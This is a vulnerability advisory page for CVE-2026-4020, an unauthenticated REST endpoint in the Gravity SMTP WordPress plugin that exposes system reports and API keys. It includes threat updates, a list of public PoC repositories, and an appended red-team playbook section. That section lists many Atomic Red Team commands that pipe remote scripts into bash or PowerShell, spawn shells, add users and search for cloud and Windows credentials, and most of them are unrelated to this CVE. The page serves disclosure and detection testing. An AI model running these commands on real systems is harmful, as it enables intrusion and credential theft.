CVE-2026-4020
Overview
This vulnerability is a Sensitive Information Exposure caused by improper access control in the Gravity SMTP WordPress plugin. The root cause lies in a REST API endpoint (/wp-json/gravitysmtp/v1/tests/mock-data) that registers a permission callback which unconditionally returns true, effectively bypassing authentication checks. This flaw affects all versions of the Gravity SMTP plugin up to and including 2.1.4, specifically within the plugin's REST API implementation.
Vulnerability Description
The Gravity SMTP plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.4. This is due to a REST API endpoint registered at /wp-json/gravitysmtp/v1/tests/mock-data with a permission_callback that unconditionally returns true, allowing any unauthenticated visitor to access it. When the ?page=gravitysmtp-settings query parameter is appended, the plugin's register_connector_data() method populates internal connector data, causing the endpoint to return approximately 365 KB of JSON containing the full System Report. This makes it possible for unauthenticated attackers to retrieve detailed system configuration data including PHP version, loaded extensions, web server version, document root path, database server type and version, WordPress version, all active plugins with versions, active theme, WordPress configuration details, database table names, and any API keys/tokens configured in the plugin.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to retrieve extensive sensitive system configuration data and credentials, including API keys and tokens configured in the plugin. No authentication or user interaction is required, and the vulnerability is exploitable over the network. This exposure can facilitate further targeted attacks, reconnaissance, and lateral movement within the affected environment. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that the attack requires no privileges or user interaction, increasing its severity.
Solution
Users should upgrade the Gravity SMTP WordPress plugin to a version later than 2.1.4 where this issue is resolved. Detailed patch information and remediation guidance are available from the vendor at https://www.gravityforms.com/gravity-smtp/ and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a. No specific workaround is documented; applying the update is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Gravity SMTP plugin for WordPress presents a significant vulnerability due to its REST API endpoint, which is improperly secured. This endpoint, located at /wp-json/gravitysmtp/v1/tests/mock-data, is designed to provide diagnostic information but lacks adequate authentication controls. The permission callback for this endpoint is set to always return true, allowing any unauthenticated user to access sensitive information. When the query parameter ?page=gravitysmtp-settings is appended, it triggers the register_connector_data() method, which populates the endpoint with internal connector data. This results in the exposure of approximately 365 KB of JSON data that includes critical system configuration details such as PHP version, web server version, active plugins, and even API keys or tokens configured within the plugin.
The attack vectors associated with this vulnerability are straightforward yet highly effective. An attacker could exploit this weakness by crafting a simple HTTP GET request to the vulnerable endpoint, appending the necessary query parameter to retrieve sensitive system information. Given that the endpoint is accessible without authentication, even individuals with minimal technical knowledge can execute this attack. Once an attacker gains access to the system report, they can gather intelligence about the underlying infrastructure, potentially leading to further exploitation. For instance, knowledge of the PHP version and loaded extensions could allow an attacker to identify known vulnerabilities in those components, facilitating a more targeted attack.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on WordPress for their web presence. The exposure of sensitive configuration data can lead to a variety of security risks, including unauthorized access to the WordPress admin panel, database breaches, and the potential for further exploitation of the server environment. Businesses may face reputational damage, financial losses, and regulatory penalties if sensitive customer data is compromised as a result of this vulnerability. The risk is exacerbated for organizations that store sensitive information or operate in regulated industries, where data protection is paramount.
To detect and mitigate this vulnerability, organizations should first conduct a thorough assessment of their WordPress installations, specifically focusing on the Gravity SMTP plugin. Regular vulnerability scans and penetration testing can help identify exposed endpoints and assess the security posture of the application. Additionally, organizations should implement strict access controls and authentication mechanisms for all API endpoints, ensuring that sensitive data is only accessible to authorized users. Updating the Gravity SMTP plugin to the latest version, where this vulnerability has been addressed, is crucial. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests targeting the exposed endpoint.
In conclusion, the vulnerability within the Gravity SMTP plugin underscores the importance of robust security practices in web application development and maintenance. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against such threats. Proactive detection and mitigation strategies are essential to safeguard sensitive information and maintain the integrity of their web applications. As the landscape of cybersecurity continues to evolve, staying informed and vigilant against emerging vulnerabilities remains a critical component of any comprehensive security strategy.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-4020, with a notable surge in telemetry indicating increased probing and potential exploitation attempts targeting the Gravity SMTP plugin’s vulnerable REST API endpoint. This uptick reflects growing adversary interest in leveraging the permission misconfiguration to access sensitive connector data without authentication. Although no new exploit code has been publicly disclosed, the elevated EPSS score and the sharp rise in detection events underscore an increased likelihood of exploitation in the wild. For defenders, this shift signals a heightened risk environment where opportunistic attackers may attempt to extract sensitive information or use the exposed endpoint as a foothold for further compromise. Consequently, the threat level for affected RocketGenius Gravity SMTP deployments has escalated to high, reinforcing the urgency for vigilant monitoring and rapid response to suspicious activity associated with this vulnerability.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2026-4020, reflecting a more than twofold rise in the likelihood of exploitation. This upward adjustment occurs despite a concurrent significant reduction in detection activity across our telemetry, suggesting that while active exploitation attempts may be less frequently observed, the underlying risk of exploitation is intensifying. The EPSS score now places this vulnerability near the top percentile of predicted exploitability, underscoring its growing attractiveness to threat actors. This divergence between detection trends and predictive scoring may indicate emerging stealth tactics or shifts in attacker behavior that reduce overt detection but do not diminish the threat. For defenders, this evolving landscape signals an elevated risk posture requiring heightened vigilance, as the vulnerability’s exposure remains unmitigated and the potential for sensitive information leakage persists. The threat level for RocketGenius Gravity SMTP deployments should be considered elevated to high, reflecting the increased probability of exploitation despite the current lull in observable attack activity.
Update 3 — June 21, 2026
CSURFACE threat intelligence has detected a marked escalation in attempts to leverage the Gravity SMTP plugin vulnerability, reflected by a sharp increase in detection activity across our sensors. This surge contrasts with a concurrent decline in the EPSS score, suggesting that while exploit attempts are becoming more frequent and visible, automated exploit kits or widespread scanning campaigns may be less prevalent or less effective. The divergence between rising detection events and falling predictive exploitability underscores a potential shift in attacker tactics, possibly favoring targeted or stealthier approaches rather than mass exploitation. For defenders, this development signals an elevated risk environment where the vulnerability remains actively probed and exploited in the wild, increasing the likelihood of sensitive information exposure in affected WordPress deployments. Consequently, the threat level associated with CVE-2026-4020 should be reassessed as high, reflecting both the intensifying adversary interest and the persistent absence of effective mitigation in many environments.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
faizdotid/CVE-2026-4020
|
faizdotid | 0 | 0 | 2026-06-30 | View |
|
HORKimhab/CVE-2026-4020
CVE-2026-4020 - Draft
|
HORKimhab | 0 | 0 | 2026-06-22 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: RocketGenius, product: Gravity SMTP
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.